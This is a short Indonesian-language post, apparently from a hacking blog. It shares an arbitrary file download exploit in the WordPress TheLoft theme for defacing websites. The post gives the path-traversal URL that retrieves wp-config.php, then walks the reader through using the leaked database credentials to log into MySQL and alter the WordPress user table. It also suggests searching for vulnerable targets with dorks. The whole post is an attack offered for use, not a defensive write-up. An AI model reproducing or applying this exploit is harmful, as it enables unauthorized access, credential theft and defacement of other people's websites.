Oke kali ini saya mau share exploit deface yang digunakan untuk deface wordpress. Namanya WordPress TheLoft Theme Arbitrary File Download Vulnerability. Termasuk exploit baru sih . Tinggal bagaimana dork yang kita gunakan .
Exploit :
http://localhost/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
Buka file wp-config.php nya, disitu ada user dan password untuk login database.
 |
| Exploit |
Jika db host nya localhost, cari yang lain lagi. cari yang pake url/server :p
Login MySQL, modif wp_user nya .
Sekian tutorial kali ini semoga bermanfaat.
